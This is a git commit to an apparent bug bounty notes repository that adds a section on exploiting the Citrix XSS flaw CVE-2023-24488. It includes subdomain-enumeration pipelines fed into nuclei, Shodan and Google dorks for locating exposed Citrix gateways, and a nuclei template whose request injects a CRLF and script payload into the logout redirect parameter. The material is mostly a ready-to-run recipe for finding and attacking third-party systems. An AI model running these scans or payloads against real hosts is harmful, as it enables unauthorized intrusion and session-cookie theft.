GITBOOK-51: change request with no subject merged in GitBook

2024-11-10 06:04:20 +00:00 · 2023-07-25 11:16:45 +00:00 · 2023-07-25 11:16:45 +00:00 · aedb40ca27
commit aedb40ca27
parent 692f151b2b
3 changed files with 61 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -359,6 +359,21 @@ GET /?q=xss     POST /q=xss
 <iMg src%3dN onerror%3dalert(0x000D98)>
 ```

+### Nuclei CVE-2023-24488 Citrix XSS - Easy Bug Bounty
+
+**Command**:\
+subfinder -d [target.com](http://target.com/) -silent | nuclei -t http/cves/2023/CVE-2023-24488.yaml\
+\
+assetfinder [target.com](http://target.com/) | nuclei -t http/cves/2023/CVE-2023-24488.yaml\
+\
+**Template**: [xss-nuclei-template-cve-2023-24488.yaml.md](xss-nuclei-template-cve-2023-24488.yaml.md "mention")\
+\
+**Shodan Dork**:\
+ssl:[target.com](http://target.com/) title:"Citrix gateway"\
+\
+**Dork**:\
+intitle:"Citrix Gateway" -site:[citrix.com](http://citrix.com/)
+
 ### Some awesome people on twitter

 * [@Dark\_Knight](https://twitter.com/\_Dark\_Knight\_)
--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -13,3 +13,4 @@
  * [🔎 How I hacked NASA and got 8 bugs ?](recon-strategies-by-other-hackers/how-i-hacked-nasa-and-got-8-bugs.md)
  * [🔎 Simple Recon Methodology](recon-strategies-by-other-hackers/simple-recon-methodology.md)
 * [🌀 Possible "Content-Type" Header values](possible-content-type-header-values.md)
+* [🎯 XSS nuclei template CVE-2023-24488.yaml](xss-nuclei-template-cve-2023-24488.yaml.md)
--- a/xss-nuclei-template-cve-2023-24488.yaml.md
+++ b/xss-nuclei-template-cve-2023-24488.yaml.md
@ -0,0 +1,45 @@
+# 🎯 XSS nuclei template CVE-2023-24488.yaml
+
+```yaml
+id: CVE-2023-24488
+
+info:
+  name: CVE-2023-24488
+  author: assetnote
+  severity: medium
+  description: description
+  reference:
+    - https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
+  tags: tags
+
+requests:
+  - raw:
+      - |+
+        GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: NSC_TASS=/Citrix
+        Cache-Control: max-age=0
+        Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Brave";v="114"
+        Sec-Ch-Ua-Mobile: ?0
+        Sec-Ch-Ua-Platform: "Windows"
+        Upgrade-Insecure-Requests: 1
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
+        Sec-Gpc: 1
+        Accept-Language: en-GB,en
+        Sec-Fetch-Site: none
+        Sec-Fetch-Mode: navigate
+        Sec-Fetch-User: ?1
+        Sec-Fetch-Dest: document
+        Accept-Encoding: gzip, deflate
+        Connection: close
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - <script>alert(document.cookie)</script>
+      - type: status
+        status:
+          - 302
+```